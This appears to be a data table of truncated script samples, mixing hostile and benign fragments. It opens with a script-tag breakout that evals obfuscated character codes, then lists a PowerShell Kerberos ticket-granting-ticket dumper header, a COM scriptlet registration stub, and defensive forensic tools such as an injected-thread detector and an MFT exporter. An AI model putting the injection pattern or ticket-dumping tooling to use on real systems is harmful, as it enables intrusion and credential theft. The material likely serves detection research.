| </script><script language=javascript>eval(String.fromCharCode(102, 117, 110, 99, 116, 105, 111, 110, 32, 101, 110, 99, 111, 100, 101, 84, 111, 72, 101, 120, 40, 115, 116, 114, 41, 123, 10, 32, 32, 32, 32, 118, 97, 114, 32, 114, 61, 34, 34, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 101, 61, 115, 116, 114, 46, 108, 101, 110, 103, 116, 104, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 99, 61, 48, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 104, 59, 10, 32, 32, 32, 32, 119, 104, 105, 108, 101, 40, 99, 60, 101, 41, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 104, 61, 115, 116, 114, 46, 99, 104, 97, 114, 67, 111, 100, 101, 65, 116, 40, 99, 43, 43, 41, 46, 116, 111, 83, 116, 114, 105, 110, 103, 40, 49, 54, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 119, 104, 105, 108, 101, 40, 104, 46, 108, 101, 110, 103, 116, 104, 60, 51, 41, 32, 104, 61, 34, 48, 34, 43, 104, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 114, 43, 61, 104, 59, 10, 32, 32, 32, 32, 125, 10, 32, 32, 32, 32, 114, 101, 116, 117, 114, 110, 32, 114, 59, 10, 125, 10, 36 |
| function Get-KerberosTicketGrantingTicket | |
| { | |
| <# | |
| .SYNOPSIS | |
| Gets the Kerberos Ticket Granting Tickets from all Logon Sessions | |
| .DESCRIPTION | |
| Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associated Kerberos Ticket Granting Tickets. |
| function WriteMessage() | |
| { | |
| Write-Host "This is a test PowerShell Script that does no harm at all" -ForegroundColor Green -BackgroundColor DarkGray | |
| } | |
| WriteMessage |
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| function Get-InjectedThread | |
| { | |
| <# | |
| .SYNOPSIS | |
| Looks for threads that were created as a result of code injection. | |
| .DESCRIPTION | |
| function Export-MFT { | |
| <# | |
| .SYNOPSIS | |
| Extracts master file table from volume. | |
| Version: 0.1 | |
| Author : Jesse Davis (@secabstraction) | |
| License: BSD 3-Clause | |
| .DESCRIPTION |
| Powershell.exe get-process |